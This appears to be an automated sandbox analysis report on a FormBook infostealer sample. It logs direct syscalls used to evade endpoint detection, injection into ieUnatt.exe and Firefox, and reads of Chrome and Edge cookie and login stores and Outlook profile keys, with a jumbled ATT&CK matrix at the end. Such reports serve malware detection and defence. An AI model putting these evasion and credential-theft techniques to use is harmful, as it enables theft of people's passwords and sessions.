                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017ACA72 mov eax, dword ptr fs:[00000030h]6_2_017ACA72
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176CA6F mov eax, dword ptr fs:[00000030h]6_2_0176CA6F
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176CA6F mov eax, dword ptr fs:[00000030h]6_2_0176CA6F
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176CA6F mov eax, dword ptr fs:[00000030h]6_2_0176CA6F
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01736A50 mov eax, dword ptr fs:[00000030h]6_2_01736A50
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01736A50 mov eax, dword ptr fs:[00000030h]6_2_01736A50
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01736A50 mov eax, dword ptr fs:[00000030h]6_2_01736A50
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01736A50 mov eax, dword ptr fs:[00000030h]6_2_01736A50
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01736A50 mov eax, dword ptr fs:[00000030h]6_2_01736A50
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01736A50 mov eax, dword ptr fs:[00000030h]6_2_01736A50
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01736A50 mov eax, dword ptr fs:[00000030h]6_2_01736A50
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740A5B mov eax, dword ptr fs:[00000030h]6_2_01740A5B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01740A5B mov eax, dword ptr fs:[00000030h]6_2_01740A5B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01754A35 mov eax, dword ptr fs:[00000030h]6_2_01754A35
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01754A35 mov eax, dword ptr fs:[00000030h]6_2_01754A35
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176CA38 mov eax, dword ptr fs:[00000030h]6_2_0176CA38
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176CA24 mov eax, dword ptr fs:[00000030h]6_2_0176CA24
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175EA2E mov eax, dword ptr fs:[00000030h]6_2_0175EA2E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BCA11 mov eax, dword ptr fs:[00000030h]6_2_017BCA11
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176AAEE mov eax, dword ptr fs:[00000030h]6_2_0176AAEE
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176AAEE mov eax, dword ptr fs:[00000030h]6_2_0176AAEE
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01730AD0 mov eax, dword ptr fs:[00000030h]6_2_01730AD0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01764AD0 mov eax, dword ptr fs:[00000030h]6_2_01764AD0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01764AD0 mov eax, dword ptr fs:[00000030h]6_2_01764AD0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01786ACC mov eax, dword ptr fs:[00000030h]6_2_01786ACC
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01786ACC mov eax, dword ptr fs:[00000030h]6_2_01786ACC
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01786ACC mov eax, dword ptr fs:[00000030h]6_2_01786ACC
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01738AA0 mov eax, dword ptr fs:[00000030h]6_2_01738AA0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01738AA0 mov eax, dword ptr fs:[00000030h]6_2_01738AA0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01786AA4 mov eax, dword ptr fs:[00000030h]6_2_01786AA4
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01768A90 mov edx, dword ptr fs:[00000030h]6_2_01768A90
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173EA80 mov eax, dword ptr fs:[00000030h]6_2_0173EA80
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173EA80 mov eax, dword ptr fs:[00000030h]6_2_0173EA80
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173EA80 mov eax, dword ptr fs:[00000030h]6_2_0173EA80
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173EA80 mov eax, dword ptr fs:[00000030h]6_2_0173EA80
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173EA80 mov eax, dword ptr fs:[00000030h]6_2_0173EA80
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173EA80 mov eax, dword ptr fs:[00000030h]6_2_0173EA80
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173EA80 mov eax, dword ptr fs:[00000030h]6_2_0173EA80
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173EA80 mov eax, dword ptr fs:[00000030h]6_2_0173EA80
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173EA80 mov eax, dword ptr fs:[00000030h]6_2_0173EA80
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C8D6B mov eax, dword ptr fs:[00000030h]6_2_017C8D6B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01730D59 mov eax, dword ptr fs:[00000030h]6_2_01730D59
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01730D59 mov eax, dword ptr fs:[00000030h]6_2_01730D59
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01730D59 mov eax, dword ptr fs:[00000030h]6_2_01730D59
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01738D59 mov eax, dword ptr fs:[00000030h]6_2_01738D59
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01738D59 mov eax, dword ptr fs:[00000030h]6_2_01738D59
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01738D59 mov eax, dword ptr fs:[00000030h]6_2_01738D59
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01738D59 mov eax, dword ptr fs:[00000030h]6_2_01738D59
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01738D59 mov eax, dword ptr fs:[00000030h]6_2_01738D59
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01804DAD mov eax, dword ptr fs:[00000030h]6_2_01804DAD
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B8D20 mov eax, dword ptr fs:[00000030h]6_2_017B8D20
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01726D10 mov eax, dword ptr fs:[00000030h]6_2_01726D10
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01726D10 mov eax, dword ptr fs:[00000030h]6_2_01726D10
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01726D10 mov eax, dword ptr fs:[00000030h]6_2_01726D10
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01764D1D mov eax, dword ptr fs:[00000030h]6_2_01764D1D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E8D10 mov eax, dword ptr fs:[00000030h]6_2_017E8D10
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017E8D10 mov eax, dword ptr fs:[00000030h]6_2_017E8D10
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174AD00 mov eax, dword ptr fs:[00000030h]6_2_0174AD00
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174AD00 mov eax, dword ptr fs:[00000030h]6_2_0174AD00
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174AD00 mov eax, dword ptr fs:[00000030h]6_2_0174AD00
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01726DF6 mov eax, dword ptr fs:[00000030h]6_2_01726DF6
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175CDF0 mov eax, dword ptr fs:[00000030h]6_2_0175CDF0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175CDF0 mov ecx, dword ptr fs:[00000030h]6_2_0175CDF0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D0DF0 mov eax, dword ptr fs:[00000030h]6_2_017D0DF0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D0DF0 mov eax, dword ptr fs:[00000030h]6_2_017D0DF0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173ADE0 mov eax, dword ptr fs:[00000030h]6_2_0173ADE0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173ADE0 mov eax, dword ptr fs:[00000030h]6_2_0173ADE0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173ADE0 mov eax, dword ptr fs:[00000030h]6_2_0173ADE0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173ADE0 mov eax, dword ptr fs:[00000030h]6_2_0173ADE0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173ADE0 mov eax, dword ptr fs:[00000030h]6_2_0173ADE0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173ADE0 mov eax, dword ptr fs:[00000030h]6_2_0173ADE0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01750DE1 mov eax, dword ptr fs:[00000030h]6_2_01750DE1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172CDEA mov eax, dword ptr fs:[00000030h]6_2_0172CDEA
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0172CDEA mov eax, dword ptr fs:[00000030h]6_2_0172CDEA
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175EDD3 mov eax, dword ptr fs:[00000030h]6_2_0175EDD3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeNtClose: Direct from: 0x77377B2E
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\BalphRTkPS.exeMemory written: C:\Users\user\Desktop\BalphRTkPS.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: NULL target: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeSection loaded: NULL target: C:\Windows\SysWOW64\ieUnatt.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\ieUnatt.exeThread register set: target process: 1268Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\ieUnatt.exeThread APC queued: target process: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeProcess created: C:\Users\user\Desktop\BalphRTkPS.exe "C:\Users\user\Desktop\BalphRTkPS.exe"Jump to behavior
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exeProcess created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: ikSQhwOmrrnfH.exe, 00000007.00000002.4012924217.0000000001121000.00000002.00000001.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000000.2419701837.0000000001120000.00000002.00000001.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4013305264.0000000001391000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: ikSQhwOmrrnfH.exe, 00000007.00000002.4012924217.0000000001121000.00000002.00000001.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000000.2419701837.0000000001120000.00000002.00000001.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4013305264.0000000001391000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ikSQhwOmrrnfH.exe, 00000007.00000002.4012924217.0000000001121000.00000002.00000001.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000000.2419701837.0000000001120000.00000002.00000001.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4013305264.0000000001391000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ikSQhwOmrrnfH.exe, 00000007.00000002.4012924217.0000000001121000.00000002.00000001.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000000.2419701837.0000000001120000.00000002.00000001.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4013305264.0000000001391000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\BalphRTkPS.exeQueries volume information: C:\Users\user\Desktop\BalphRTkPS.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BalphRTkPS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.BalphRTkPS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.BalphRTkPS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.4016477333.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4014023454.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2499317497.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4013880559.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2505138823.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4013556321.0000000002840000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\ieUnatt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.BalphRTkPS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.BalphRTkPS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.4016477333.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4014023454.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2499317497.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4013880559.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2505138823.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4013556321.0000000002840000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		51
